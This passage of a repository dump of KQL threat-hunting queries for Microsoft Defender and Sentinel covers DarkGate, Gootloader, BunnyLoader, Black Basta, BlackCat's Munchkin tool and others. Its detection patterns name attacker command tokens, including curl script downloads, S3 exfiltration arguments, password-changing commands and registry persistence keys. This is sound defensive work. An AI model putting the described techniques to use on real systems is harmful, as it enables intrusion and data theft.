tostring(makeset(ProcessCommandLine)) by DeviceId, bin(Timestamp, 2m) 14 | | where DistinctProcessCommandLines has_any(relevantCmdlineTokens) 15 | 16 | ``` 17 | -------------------------------------------------------------------------------- /mde_ZIPdomains.md: -------------------------------------------------------------------------------- 1 | # Zip Domain Hunt Query 2 | # Source: 3 | # Description 4 | Kusto queries to detect Zip domains 5 | 6 | ``` 7 | DeviceNetworksEvents 8 | | where RemoteUrl matches regex @"(?i)^(?:https?://)?[^/]+\.zip$" 9 | ``` 10 | 11 | -------------------------------------------------------------------------------- /mde_bunny_loader_detections_2023.md: -------------------------------------------------------------------------------- 1 | # Bunny Loader MDE Detections 2 | 3 | # Source 4 | https://www.zscaler.com/blogs/security-research/bunnyloader-newest-malware-service 5 | 6 | # Command and Control - Useragent and URI related IoCs 7 | ``` 8 | let UserAgents = datatable(useragent:string)["BunnyLoader","BunnyTasks"]; 9 | DeviceNetworkEvents 10 | | extend user_agent = tostring(AdditionalFields.user_agent) 11 | | extend HTTPMethod = tostring(AdditionalFields.method) 12 | | extend uri = tostring(AdditionalFields.uri) 13 | | where ActionType has_any ("HttpConnectionInspected","SslConnectionInspected") and user_agent has_any (UserAgents) and uri has_all ("Bunny") and HTTPMethod =~ "GET" 14 | | extend direction = tostring(AdditionalFields.direction) 15 | | extend host = tostring(AdditionalFields.host) 16 | | extend request_body_len = tostring(AdditionalFields.request_body_len) 17 | | extend response_body_len = tostring(AdditionalFields.response_body_len) 18 | | extend status_code = tostring(AdditionalFields.status_code) 19 | | extend status_msg = tostring(AdditionalFields.status_msg) 20 | | extend tags = tostring(parse_json(tostring(AdditionalFields.tags))) 21 | | extend trans_depth = tostring(AdditionalFields.trans_depth) 22 | | extend version_ = tostring(AdditionalFields.version) 23 | ``` 24 | # Persistence - Registry key creation 25 | ``` 26 | DeviceRegistryEvents 27 | | where ActionType =~ "RegistryValueSet" and RegistryKey =~ @"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" and RegistryValueName =~ "Spyware_Blocker" 28 | ``` 29 | -------------------------------------------------------------------------------- /mde_commandandcontrol_.md: -------------------------------------------------------------------------------- 1 | # KQL : Hunting queries for C2 using MDE and network protection capability 2 | 3 | # Source: 4 | - https://github.com/LearningKijo/KQL/blob/main/KQL-Effective-Use/03-kql-MDE-WebProtection.md 5 | 6 | **Edge browser** - Microsoft SmartScreen 7 | ```kql 8 | DeviceEvents 9 | | where Timestamp > ago(7d) 10 | | where ActionType == "SmartScreenUrlWarning" 11 | | extend ParsedFields=parse_json(AdditionalFields) 12 | | summarize MDE_IoC = make_list_if(RemoteUrl, Experience=tostring(ParsedFields.Experience) == "CustomBlockList"), 13 | MDE_WCF = make_list_if(RemoteUrl, Experience=tostring(ParsedFields.Experience) == "CustomPolicy"), 14 | MDA_CASB = make_list_if(RemoteUrl, Experience=tostring(ParsedFields.Experience) == "CasbPolicy"), 15 | Edge_SS = make_list_if(RemoteUrl, Experience=tostring(ParsedFields.Experience) in ("Malicious", "Phishing")) by DeviceId, DeviceName 16 | | extend MDE_IoC_case = array_length(MDE_IoC) 17 | | extend MDE_WCF_case = array_length(MDE_WCF) 18 | | extend MDA_CASB_case = array_length(MDA_CASB) 19 | | extend Edge_SS_case = array_length(Edge_SS) 20 | | project DeviceId, DeviceName, MDE_IoC_case, MDA_CASB_case, MDE_WCF_case, Edge_SS_case, MDE_IoC, MDE_WCF, MDA_CASB, Edge_SS 21 | ``` 22 | 23 | **3rd party browser** - Windows Defender Exploit Guard, Network Protection 24 | ```kql 25 | DeviceEvents 26 | | where Timestamp > ago(7d) 27 | | where ActionType == "ExploitGuardNetworkProtectionBlocked" 28 | | extend ParsedFields=parse_json(AdditionalFields) 29 | | summarize MDE_IoC = make_list_if(RemoteUrl, ResponseCategory=tostring(ParsedFields.ResponseCategory) == "CustomBlockList"), 30 | MDE_WCF = make_list_if(RemoteUrl, ResponseCategory=tostring(ParsedFields.ResponseCategory) == "CustomPolicy"), 31 | MDE_NP = make_list_if(RemoteUrl, ResponseCategory=tostring(ParsedFields.ResponseCategory) == "CmdCtrl"), 32 | MDA_CASB = make_list_if(RemoteUrl, ResponseCategory=tostring(ParsedFields.ResponseCategory) == "CasbPolicy") by DeviceId, DeviceName 33 | | extend MDE_IoC_case = array_length(MDE_IoC) 34 | | extend MDE_WCF_case = array_length(MDE_WCF) 35 | | extend MDE_NP_case = array_length(MDE_NP) 36 | | extend MDA_CASB_case = array_length(MDA_CASB) 37 | | project DeviceId, DeviceName, MDE_IoC_case, MDE_NP_case, MDE_WCF_case, MDA_CASB_case, MDE_IoC, MDE_NP, MDE_WCF, MDA_CASB 38 | ``` 39 | 40 | **Bypass** - MDE Indicators Warn & MDA Monitored app 41 | ```kql 42 | DeviceEvents 43 | | where Timestamp > ago(7d) 44 | | where ActionType in ("SmartScreenUserOverride", "NetworkProtectionUserBypassEvent") 45 | | extend Browser = case( 46 | InitiatingProcessFileName has "msedge", "Edge", 47 | InitiatingProcessFileName has "chrome", "Chrome", 48 | InitiatingProcessFileName has "firefox", "Firefox", 49 | InitiatingProcessFileName has "opera", "Opera", 50 | "3rd party browser") 51 | | project Timestamp, DeviceId, DeviceName, ActionType, Browser, RemoteUrl 52 | ``` 53 | -------------------------------------------------------------------------------- /mde_darkgate_autoitScript.md: -------------------------------------------------------------------------------- 1 | # Title 2 | DarkGate autoIT script commandline detection 3 | 4 | # Source 5 | Intrusion analysis 6 | 7 | # Description 8 | 9 | ``` 10 | DeviceProcessEvents | where FileName =~ "cmd.exe" | where ProcessCommandLine has_all ("curl","http",".au3") 11 | 12 | ``` 13 | -------------------------------------------------------------------------------- /mde_darkgate_detections.md: -------------------------------------------------------------------------------- 1 | # DarkGate MDE Detetcions 2 | 3 | # Source (Intrusion Analysis) 4 | 5 | # Port and HTTP request based detection 6 | 7 | ``` 8 | DeviceNetworkEvents 9 | | where TimeGenerated > ago(60d) 10 | | extend HTTPMethod = tostring(AdditionalFields.method) 11 | | where ActionType =~ "HttpConnectionInspected" and RemotePort == 2351 and HTTPMethod =~ "POST" 12 | | extend direction = tostring(AdditionalFields.direction) 13 | | extend host = tostring(AdditionalFields.host) 14 | | extend request_body_len = tostring(AdditionalFields.request_body_len) 15 | | extend response_body_len = tostring(AdditionalFields.response_body_len) 16 | | extend status_code = tostring(AdditionalFields.status_code) 17 | | extend status_msg = tostring(AdditionalFields.status_msg) 18 | | extend tags = tostring(parse_json(tostring(AdditionalFields.tags))) 19 | | extend trans_depth = tostring(AdditionalFields.trans_depth) 20 | | extend uri = tostring(AdditionalFields.uri) 21 | | extend user_agent = tostring(AdditionalFields.user_agent) 22 | | extend version_ = tostring(AdditionalFields.version) 23 | ``` 24 | -------------------------------------------------------------------------------- /mde_darkgate_sharepoint_ceo_link.md: -------------------------------------------------------------------------------- 1 | # Title 2 | Darkgate 3 | 4 | # Source 5 | Intrusion Anlysis 6 | 7 | # Description 8 | 9 | 10 | ``` 11 | UrlClickEvents 12 | | where Workload =~ "Teams" 13 | | where Url matches regex @"https:\/\/[a-zA-Z0-9-_]+\.sharepoint\.com\/:[a-zA-Z]:\/g\/personal\/[a-zA-Z0-9_]+_onmicrosoft_com" 14 | 15 | ``` 16 | 17 | ``` 18 | DeviceNetworkEvents 19 | | where RemoteUrl has_all ("ceo",".sharepoint.com","_onmicrosoft_com") 20 | 21 | ``` 22 | 23 | ``` 24 | UrlClickEvents 25 | | where Url has_all ("ceo",".sharepoint.com","_onmicrosoft_com") 26 | ``` 27 | 28 | ``` 29 | DeviceNetworkEvents 30 | | where RemoteUrl matches regex @"https:\/\/[a-zA-Z0-9-_]+\.sharepoint\.com\/:[a-zA-Z]:\/g\/personal\/[a-zA-Z0-9_]+_onmicrosoft_com" 31 | 32 | ``` 33 | -------------------------------------------------------------------------------- /mde_darkgate_vbs_download.md: -------------------------------------------------------------------------------- 1 | # DarkGate VBS File Downlod 2 | 3 | # Source 4 | Intrusion Analysis 5 | 6 | # MDE 7 | ``` 8 | DeviceNetworkEvents 9 | | where InitiatingProcessCommandLine has_all (".vbs") and RemotePort == 2351 and InitiatingProcessFileName =~ "wscript.exe" 10 | ``` 11 | -------------------------------------------------------------------------------- /mde_exfiltration_to_S3.md: -------------------------------------------------------------------------------- 1 | # Title 2 | Data exfiltration to AWS S3 via commandline 3 | 4 | # Source 5 | DFIR Report - 6 | 7 | # Description 8 | 9 | ``` 10 | DeviceProcessEvents 11 | | where InitiatingProcessFileName endswith "WaAppAgent.exe" and InitiatingProcessCommandLine has_all (" s3 "," cp ","--exclude",".dll",".exe") 12 | 13 | ``` 14 | -------------------------------------------------------------------------------- /mde_exploitguard_events.md: -------------------------------------------------------------------------------- 1 | # ExplotGuard IoCs Query 2 | 3 | # Source 4 | 5 | - Twitter Elli Shlomo: https://twitter.com/ellishlomo/status/1655828023482908673 6 | 7 | ``` 8 | //exploit guard IoCs across Defender products 9 | DeviceEvents 10 | | where ActionType =~ "ExploitGuardNetworkProtectionBlocked" 11 | | extend AdditionalInfo = parse_json(AdditionalFields) 12 | | summarize MDE = countif(ResponseCategory=tostring(AdditionalInfo.ResponseCategory) =="CustomBlockList"), //url indicators 13 | MDE_WCF = countif(ResponseCategory=tostring(AdditionalInfo.ResponseCategory) =="CustomPolicy"), //url indicators 14 | MDA = countif(ResponseCategory=tostring(AdditionalInfo.ResponseCategory) =="CasbPolicy") //url indicators 15 | by DeviceName, RemoteUrl, InitiatingProcessAccountUpn, InitiatingProcessAccountDomain 16 | ``` 17 | -------------------------------------------------------------------------------- /mde_file_downloads.md: -------------------------------------------------------------------------------- 1 | # File Downloads 2 | 3 | ## mde kql query 4 | ``` 5 | // Detect file downloads 6 | DeviceNetworkEvents 7 | | where ActionType == 'HttpConnectionInspected' 8 | | extend json = todynamic(AdditionalFields) 9 | | extend direction= tostring(json.direction), user_agent=tostring(json.user_agent), uri=tostring(json.uri) 10 | | where uri matches regex @"\.(?:dll|exe|zip|7z|ps1|ps|bat|sh)$" 11 | ``` 12 | -------------------------------------------------------------------------------- /mde_headlessBrowserChromium.md: -------------------------------------------------------------------------------- 1 | # Chromium Based Headless browser download 2 | 3 | # Description 4 | detection analytic looks for Chromium-based browsers opening with the headless parameter and subsequently downloading files from a remote location. While developers may use headless browsers to download files, it is an unusual way to do so. This analytic can help identify Ducktail as well as other suspicious activity. 5 | 6 | # Source 7 | https://redcanary.com/blog/intelligence-insights-june-2023/ 8 | 9 | # Analytics 10 | 11 | ## MDE 12 | 13 | Analytic to identify chromium-based headless browsers being used to download files. Can identify Ducktail infostealer and other unusual activity. 14 | 15 | ``` 16 | // Chromium-based headless browsers being used to download files. Can identify Ducktail infostealer and other unusual activity. 17 | // https://redcanary.com/blog/intelligence-insights-june-2023/?utm_source=redcanary&utm_medium=email&utm_campaign=Blog%20Digest-2023-06-23T09:00:07.795-06:00&mkt_tok=MDAzLVlSVS0zMTQAAAGMh8L-8o-_Q9SP1hoJeNiD2eROhNCDfE-o9-mzCwm2WWNKCJBsCemaZGtIk0Z6CPB6HvtJ3Tw56zP18g_5eysElp6SPgKrW6DFYNQtuLYKRZY 18 | let args = datatable(name:string)["--headless","--dump-dom","http"]; 19 | let chromiumBrowsers = datatable(name:string)["chrome.exe","msedge.exe"]; //add others 20 | DeviceProcessEvents 21 | | where (InitiatingProcessFileName has_any (chromiumBrowsers) or FileName has_any (chromiumBrowsers)) and (InitiatingProcessCommandLine has_all (args) or ProcessCommandLine has_all (args)) 22 | ``` 23 | -------------------------------------------------------------------------------- /mde_initiaaccess_qr_code.md: -------------------------------------------------------------------------------- 1 | # QR Phishing Identification 2 | 3 | # Sources: 4 | https://rodtrent.substack.com/p/microsoft-sentinel-soc-101-how-to-b94 5 | 6 | ``` 7 | let image_extensions = dynamic(["jpg", "jpeg", "png", "bmp", "gif"]); 8 | EmailAttachmentInfo 9 | | where FileType in (image_extensions) 10 | | where FileName matches regex "[A-Z0-9]{9,10}.[A-Za-z0-9]+$" 11 | | join EmailUrlInfo on TenantId 12 | | where UrlLocation == "Attachment" 13 | | distinct FileName, FileType, SenderFromAddress, RecipientEmailAddress, UrlDomain, Url 14 | ``` 15 | 16 | ``` 17 | EmailEvents 18 | | where AttachmentCount == 2 19 | | join EmailAttachmentInfo on NetworkMessageId 20 | | where FileName matches regex @"[A-Z]{9,10}\.(png|jpeg|jpg|bmp|gif)" 21 | | where EmailDirection == 'Inbound' 22 | ``` 23 | -------------------------------------------------------------------------------- /mde_mal_munchkin_raas.md: -------------------------------------------------------------------------------- 1 | # Name 2 | Munchkin Tool 3 | 4 | # Description 5 | The Munchkin utility is delivered as an ISO file, which is loaded in a newly installed instance of the VirtualBox virtualization product. This ISO file represents a customized implementation of the Alpine OS, which threat operators likely chose due to its small footprint. Upon running the operating system, the following commands are executed at boot: 6 | 7 | # Source: 8 | https://unit42.paloaltonetworks.com/blackcat-ransomware-releases-new-utility-munchkin/ 9 | 10 | 11 | # Detection 12 | 13 | ``` 14 | let commands = datatable(command:string)["new-session","-A","-s","controller","send","-t","controller","/app/controller","&&","poweroff","ENTER","detach","-s","controller"]; 15 | DeviceProcessEvents 16 | | where ProcessCommandLine has_all (commands) or InitiatingProcessCommandLine has_all (commands) 17 | ``` 18 | 19 | ``` 20 | let c1 = datatable(a:string)["new-session","-A","-s","controller","send","-t","controller","/app/controller","&&","poweroff","ENTER","detach","-s","controller"]; 21 | let c2 = datatable(b:string)["echo","-n","password","|","chpasswd"]; 22 | let c3 = datatable(c:string)["eject"]; 23 | let command1 = DeviceProcessEvents | where ProcessCommandLine has_all (c1) | distinct DeviceId, ProcessCommandLine; 24 | let command2 = DeviceProcessEvents | where ProcessCommandLine has_all (c2) | distinct DeviceId, ProcessCommandLine; 25 | let command3 = DeviceProcessEvents | where ProcessCommandLine has_all (c3) | distinct DeviceId, ProcessCommandLine; 26 | command1 | join command2 on DeviceId | join command3 on DeviceId 27 | | where isnotempty(DeviceId) and isnotempty(DeviceId1) and isnotempty(DeviceId2) 28 | ``` 29 | -------------------------------------------------------------------------------- /mde_persistence_registry_winlogon_t1547.md: -------------------------------------------------------------------------------- 1 | # Title 2 | Winlogon Registry Key Persistence 3 | 4 | # Tactics: 5 | - Persistence 6 | - T1547: Boot or Logon Autostart Execution 7 | - T1547.001: Registry Run Keys / Startup Folder 8 | 9 | # Source 10 | - https://www.hackingarticles.in/windows-persistence-using-winlogon/ 11 | 12 | # Description 13 | Find Winlogon with outbound connections #MDE 14 | 15 | Kusto: 16 | 17 | ``` 18 | DeviceRegistryEvents 19 | | where ActionType in~ ("RegistryValueSet","RegistryValueCreated") 20 | | where ( RegistryKey has @"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" or RegistryKey has @"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" ) and RegistryValueName in~ ("shell","userinit") 21 | // review the key and associated key value to understand if malicious activity has taken place e.g. C:\Windows\system32\userinit.exe, C:\Windows\System32\evil.exe 22 | 23 | ``` 24 | -------------------------------------------------------------------------------- /mde_rmm_tools.md: -------------------------------------------------------------------------------- 1 | # Title 2 | RMM Tool Hunt Queries 3 | 4 | # Description 5 | Analytics to hunt for RMM tool usage in the environment 6 | 7 | # MITRE ATT&CK 8 | TA0011: Command and Control 9 | T1219: Remote Access Software 10 | T1133: External Remote Services 11 | 12 | # MDE Queries 13 | 14 | ## Splashtop 15 | ``` 16 | DeviceProcessEvents 17 | | where (ProcessVersionInfoProductName contains "SplashTop" and ProcessVersionInfoFileDescription contains "SplashTop") or (ProcessVersionInfoOriginalFileName contains "SplashTop") 18 | 19 | ``` 20 | -------------------------------------------------------------------------------- /mde_script_execution_from_explorer_ZIP_function.md: -------------------------------------------------------------------------------- 1 | # Red Canary Intelligence Insights: September 2023 2 | 3 | **Source:** https://redcanary.com/blog/intelligence-insights-september-2023/ 4 | 5 | **Experimental hunting queries based on Red Canary threat report (Untested)** 6 | 7 | **MDE and Sentinel** 8 | 9 | ``` 10 | //The following detection analytic identifies scripts executed from the built-in explorer.exe ZIP folder function. Adversaries like Scarlet Goldfinch often compress malicious scripts via a ZIP file in an attempt to evade network-based security products. Investigating follow-on file modifications, registry modifications, and child processes related to this behavior can help determine if it is malicious or legitimate. 11 | DeviceNetworkEvents 12 | | where InitiatingProcessFileName =~ "wscript.exe" and ( InitiatingProcessCommandLine has_any ("users","temp") and InitiatingProcessCommandLine has_any (".zip",".js") ) 13 | ``` 14 | 15 | ``` 16 | //The following detection analytic identifies scripts executed from the built-in explorer.exe ZIP folder function. Adversaries like Scarlet Goldfinch often compress malicious scripts via a ZIP file in an attempt to evade network-based security products. Investigating follow-on file modifications, registry modifications, and child processes related to this behavior can help determine if it is malicious or legitimate. 17 | DeviceProcessEvents 18 | | where InitiatingProcessParentFileName =~ "explorer.exe" and InitiatingProcessFileName =~ "wscript.exe" and ( InitiatingProcessCommandLine has_any ("users","temp") and InitiatingProcessCommandLine has_any (".zip",".js") ) 19 | ``` 20 | -------------------------------------------------------------------------------- /mde_smartscreen_events.md: -------------------------------------------------------------------------------- 1 | # MDE Smartscreen Events 2 | 3 | Source: https://twitter.com/ellishlomo/status/1655097765565722629 4 | 5 | ``` 6 | let SmartScreenActions = dynamic([ 7 | "SmartScreenAppWarning", 8 | "SmartScreenExploitWarning", 9 | "SmartScreenUrlWarning", 10 | "SmartScreenUserOverride" 11 | ]); 12 | DeviceEvents 13 | | where ActionType has_any (SmartScreenActions) 14 | ``` 15 | -------------------------------------------------------------------------------- /mde_smb_filecopy.md: -------------------------------------------------------------------------------- 1 | # Title 2 | Lateral movement copying files to the DC 3 | 4 | # Source 5 | @eschlomo 6 | 7 | # MITRE ATT&CK 8 | - TA0033 - Lateral Movement 9 | - T1570 - Lateral Tool Transfer 10 | - T1021.002 - SMB/Windows Admin Shares 11 | - T1210 - Exploitation of Remote Services 12 | - T1021 - Remote Services 13 | 14 | 15 | MDE queries 16 | ``` 17 | IdentityDirectoryEvents 18 | | where Timestamp >= ago(1h) 19 | | where ActionType == "SMB file copy" 20 | | extend ParsedFields=parse_json(AdditionalFields) 21 | | extend FileName=tostring(ParsedFields.FileName) 22 | | extend FilePath=tostring(ParsedFields.FilePath) 23 | | extend ActionMethod=tostring(ParsedFields.Method) 24 | | where ActionMethod == "Write" 25 | | summarize Count = count() by Timestamp, ActionType, ActionMethod, AccountDisplayName, DeviceName, DestinationDeviceName, FileName, FilePath 26 | ``` 27 | -------------------------------------------------------------------------------- /mde_stealer.md: -------------------------------------------------------------------------------- 1 | # Heading 2 | -------------------------------------------------------------------------------- /mde_various_loldrivers.md: -------------------------------------------------------------------------------- 1 | # LOLDRIVERS Threat Hunting 2 | 3 | # Source: 4 | 5 | - WWW.LOLDRIVERS.IO 6 | 7 | # KQL Hunt Query 8 | 9 | ``` 10 | let loldrivers = externaldata(Id:string, Author:string, Created:datetime, MitreID:string, Category:string, Verified:bool, Commands:dynamic, Resources:dynamic, Acknowledgement:dynamic, Detection:dynamic, KnownVulnerableSamples:dynamic, Tags:dynamic) 11 | [h@'https://www.loldrivers.io/api/drivers.json'] 12 | with(format='multijson') 13 | | mv-expand KnownVulnerableSamples 14 | | extend SHA256_ = tostring(KnownVulnerableSamples.SHA256) 15 | | extend SHA1_ = tostring(KnownVulnerableSamples.SHA1) 16 | | extend MD5_ = tostring(KnownVulnerableSamples.MD5) 17 | ; 18 | DeviceFileEvents 19 | | where SHA1 in~ (loldrivers) or MD5 in~ (loldrivers) or SHA256 in~ (loldrivers) 20 | ``` 21 | -------------------------------------------------------------------------------- /med_tampering_event.md: -------------------------------------------------------------------------------- 1 | # MDE Tampering Event 2 | 3 | # Source: https://twitter.com/ellishlomo/status/1653622838949969925 4 | 5 | ``` 6 | DeviceEvents 7 | | where ActionType == "TamperingAttempt" 8 | | extend AdditionalInfo = parse_json(AdditionalFields) 9 | | extend Status = AdditionalInfo.['Status'] 10 | | extend Target = AdditionalInfo.['Target'] 11 | ``` 12 | -------------------------------------------------------------------------------- /nf_mal-ttp_t1059_007_gootloader.md: -------------------------------------------------------------------------------- 1 | # Windows Script Host (wscript.exe) Executing Content from a User's AppData Folder 2 | 3 | ## Query Information 4 | 5 | #### MITRE ATT&CK Technique(s) 6 | 7 | | Technique ID | Title | Link | 8 | | --- | --- | --- | 9 | | T1059.007 | Command and Scripting Interpreter: PowerShell | [Command and Scripting Interpreter: JavaScript](https://attack.mitre.org/techniques/T1059/007/) | 10 | 11 | #### Description 12 | This detection rule identifies instances where the Windows Script Host (`wscript.exe`) is executing a JavaScript (`.js`) file from the user's `AppData` folder. It aims to detect instances where a user may have unintentionally executed malicious content by opening a file associated with Gootloader. 13 | 14 | #### Risk 15 | This detection helps identify potential execution of malicious scripts from a user’s `AppData` folder, a common tactic for malware such as Gootloader. This behavior is a common sign of an initial compromise, often leading to further infection or data exfiltration. 16 | 17 | #### Author 18 | - **Name:** Gavin Knapp 19 | - **Github:** [https://github.com/m4nbat](https://github.com/m4nbat) 20 | - **Twitter:** [https://twitter.com/knappresearchlb](https://twitter.com/knappresearchlb) 21 | - **LinkedIn:** [https://www.linkedin.com/in/grjk83/](https://www.linkedin.com/in/grjk83/) 22 | 23 | #### References 24 | - https://redcanary.com/wp-content/uploads/2022/05/Gootloader.pdf 25 | - https://kqlquery.com/ 26 | - https://github.com/Bert-JanP/Hunting-Queries-Detection-Rules 27 | 28 | ## Defender For Endpoint 29 | ```KQL 30 | DeviceProcessEvents 31 | | where FileName =~ "wscript.exe" 32 | | where ProcessCommandLine has @"\appdata\" and ProcessCommandLine endswith ".js" 33 | -------------------------------------------------------------------------------- /nf_mal-ttp_t1218.011_gootloader.md: -------------------------------------------------------------------------------- 1 | # Rundll32 (rundll32.exe) with No Command-Line Arguments 2 | 3 | ## Query Information 4 | 5 | #### MITRE ATT&CK Technique(s) 6 | 7 | | Technique ID | Title | Link | 8 | | --- | --- | --- | 9 | | T1218.011 | Signed Binary Proxy Execution: Rundll32 | [Signed Binary Proxy Execution: Rundll32](https://attack.mitre.org/techniques/T1218/011/) | 10 | 11 | #### Description 12 | This detection rule identifies instances of `rundll32.exe` executing with no command-line arguments. This behavior is often indicative of malicious activity, such as injection by Cobalt Strike beacons, and has been observed in Gootloader infections. 13 | 14 | #### Risk 15 | Rundll32 executing without command-line arguments is uncommon in legitimate operations and often signifies injection techniques leveraged by malware, particularly Gootloader and Cobalt Strike. 16 | 17 | #### Author 18 | - **Name:** Gavin Knapp 19 | - **Github:** [https://github.com/m4nbat](https://github.com/m4nbat) 20 | - **Twitter:** [https://twitter.com/knappresearchlb](https://twitter.com/knappresearchlb) 21 | - **LinkedIn:** [https://www.linkedin.com/in/grjk83/](https://www.linkedin.com/in/grjk83/) 22 | 23 | #### References 24 | - https://redcanary.com/wp-content/uploads/2022/05/Gootloader.pdf 25 | - https://kqlquery.com/ 26 | - https://github.com/Bert-JanP/Hunting-Queries-Detection-Rules 27 | 28 | ## Defender For Endpoint 29 | ```KQL 30 | DeviceNetworkEvents 31 | | where FileName =~ "rundll32.exe" 32 | | where isnull(ProcessCommandLine) 33 | 34 | ```KQL 35 | DeviceProcessEvents 36 | | where InitiatingProcessFileName =~ "rundll32.exe" 37 | | where isnull(InitiatingProcessCommandLine) 38 | -------------------------------------------------------------------------------- /nf_mal_ttp_cve-2023-36025_phemedroneStealer.md: -------------------------------------------------------------------------------- 1 | # *CVE-2023-36025 Exploited for Defense Evasion in Phemedrone Stealer Campaign* 2 | 3 | ## Query Information 4 | 5 | #### MITRE ATT&CK Technique(s) 6 | 7 | | Technique ID | Title | Link | 8 | | --- | --- | --- | 9 | | T1218.002​ | Signed Binary Proxy Execution: Control Panel |[Control Panel](https://attack.mitre.org/techniques/T1218/002/)| 10 | 11 | #### Description 12 | This set of hunt queries delve into the Phemedrone Stealer campaign's exploitation of CVE-2023-36025, the Windows Defender SmartScreen Bypass vulnerability, addressing its defense evasion and faciolitating investigation of the malware's payload behaviours and TTPs. 13 | 14 | #### Risk 15 | This collection of hunt queries aim to detect behaviours associated with malware exploitation of CVW-2023-36025 and subsequent TTPs as part of its intrusion set or attack flow. 16 | 17 | #### Author 18 | - **Name:** Gavin Knapp 19 | - **Github:** https://github.com/m4nbat 20 | - **Twitter:** https://twitter.com/knappresearchlb 21 | - **LinkedIn:** https://www.linkedin.com/in/grjk83/ 22 | - **Website:** 23 | 24 | #### References 25 | - https://www.trendmicro.com/en_us/research/24/a/cve-2023-36025-exploited-for-defense-evasion-in-phemedrone-steal.html 26 | - https://github.com/FalconForceTeam/FalconFriday/blob/master/Defense%20Evasion/T1218-WIN-001.md 27 | - https://medium.com/falconforce/falconfriday-process-injection-and-malicious-cpl-files-0xff03-8ba1ee5da64 28 | 29 | ## Defender For Endpoint 30 | 31 | ### Signed Binary Proxy Execution: Control Panel (T1218.002)​ 32 | 33 | ```KQL 34 | // source FalconForce https://medium.com/falconforce/falconfriday-process-injection-and-malicious-cpl-files-0xff03-8ba1ee5da64 35 | // https://github.com/FalconForceTeam/FalconFriday/blob/master/Defense%20Evasion/T1218-WIN-001.md 36 | //Fairly accurate. Depends on ATP for "Global Prevalence" to filter out false positives. 37 | let suspiciousCPLs = DeviceImageLoadEvents 38 | | where FileName endswith ".cpl" 39 | | summarize by SHA1 40 | | invoke FileProfile(SHA1, 1000) 41 | | where ((isempty(Signer) or not(IsCertificateValid)) and GlobalPrevalence < 100) or GlobalPrevalence < 50; 42 | DeviceImageLoadEvents 43 | | where SHA1 has_any (suspiciousCPLs) and ActionType == "ImageLoaded" 44 | ``` 45 | ## Sentinel 46 | ```KQL 47 | // N/A due to functions being limited to MDE Advanced Hunting 48 | ``` 49 | -------------------------------------------------------------------------------- /nf_mal_ttp_t1620_gootloader.md: -------------------------------------------------------------------------------- 1 | # PowerShell (powershell.exe) Performing a Reflective Load of a .NET Assembly 2 | 3 | ## Query Information 4 | 5 | #### MITRE ATT&CK Technique(s) 6 | 7 | | Technique ID | Title | Link | 8 | | --- | --- | --- | 9 | | T1059.001 | Command and Scripting Interpreter: PowerShell | [Command and Scripting Interpreter: PowerShell](https://attack.mitre.org/techniques/T1059/001/) | 10 | | T1620 | Reflective Code Loading | [Reflective Code Loading](https://attack.mitre.org/techniques/T1620/) | 11 | 12 | #### Description 13 | This detection rule identifies instances where PowerShell is loading a .NET assembly into memory for execution. This is indicative of threats like Gootloader, which utilize `System.Reflection` to load malicious assemblies for in-memory execution. 14 | 15 | #### Risk 16 | Reflective loading of assemblies is a technique often used by malicious actors to execute code stealthily. This detection captures potentially harmful .NET assembly loads, which could indicate malware such as Gootloader or other in-memory threats. 17 | 18 | #### Author 19 | - **Name:** Gavin Knapp 20 | - **Github:** [https://github.com/m4nbat](https://github.com/m4nbat) 21 | - **Twitter:** [https://twitter.com/knappresearchlb](https://twitter.com/knappresearchlb) 22 | - **LinkedIn:** [https://www.linkedin.com/in/grjk83/](https://www.linkedin.com/in/grjk83/) 23 | 24 | #### References 25 | - https://redcanary.com/wp-content/uploads/2022/05/Gootloader.pdf 26 | - https://kqlquery.com/ 27 | - https://github.com/Bert-JanP/Hunting-Queries-Detection-Rules 28 | 29 | ## Defender For Endpoint 30 | ```KQL 31 | DeviceProcessEvents 32 | | where FileName =~ "powershell.exe" 33 | | where ProcessCommandLine has_all ("Reflection.Assembly", "Load", "byte[]") 34 | -------------------------------------------------------------------------------- /nf_ttp_blackbasta_quickassist.md: -------------------------------------------------------------------------------- 1 | // Look for anomalous emails being received that contain keywords in the subject linked to email bombing campaigns 2 | EmailEvents 3 | | where EmailDirection == "Inbound" and Subject has_all ("subscription","confirm") 4 | | make-series Emailcount = count() 5 | on Timestamp 6 | step 1h 7 | by RecipientObjectId, SourceTenant = TenantId 8 | | extend (Anomalies, AnomalyScore, ExpectedEmails) = series_decompose_anomalies(Emailcount) 9 | | mv-expand Emailcount, Anomalies, AnomalyScore, ExpectedEmails to typeof(double), Timestamp 10 | | where Anomalies != 0 11 | | where AnomalyScore >= 10 // can be tweaked to suit each hunt 12 | | where Emailcount > 5 // only return instances where there are more than 5 emails in the period with the subject keyword matches 13 | 14 | // Search for the email results based on the results f the above query 15 | EmailEvents 16 | | where RecipientObjectId in ("ENTER YOUR OBJECT ID E.G. 71d04be0-d33f-4cc1-a097-7086d7c7069d") 17 | | where Subject has_all ("subscription","confirm") // Mirror the keywords you used for the original anomaly hunt 18 | 19 | //Search for quick assist usage in the environment 20 | DeviceNetworkEvents 21 | | where InitiatingProcessCommandLine contains "QuickAssist.exe" and RemoteUrl contains "remoteassistance.support.services.microsoft.com" 22 | 23 | // Follow-on activity leading to Black Basta ransomware - curl activity 24 | let commands = datatable(command:string)["o","insecure","http"]; 25 | let net_iocs = datatable(ioc:string)["upd7","upd7a","upd9","upd5","github"]; 26 | DeviceNetworkEvents 27 | | where TimeGenerated > ago(25m) 28 | | where (InitiatingProcessVersionInfoOriginalFileName =~ "curl.exe" or InitiatingProcessFileName =~ "curl.exe") and InitiatingProcessCommandLine has_any (file_ext) and InitiatingProcessCommandLine matches regex @"(upd7.|upd7a.|upd9.|upd5.)" 29 | -------------------------------------------------------------------------------- /nf_ttp_execution_apt_turla.md: -------------------------------------------------------------------------------- 1 | # SNAKE Malware Execution Tactics 2 | 3 | ## Query Information 4 | 5 | #### MITRE ATT&CK Tactic(s) 6 | 7 | | Tactic ID | Title | Link | 8 | | --- | --- | --- | 9 | | TA0002 | Execution | [Execution](https://attack.mitre.org/tactics/TA0002/) | 10 | 11 | #### MITRE ATT&CK Technique(s) 12 | 13 | | Technique ID | Title | Link | 14 | | --- | --- | --- | 15 | | T1059 | Command and Scripting Interpreter | [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059/) | 16 | | T1068 | Exploitation for 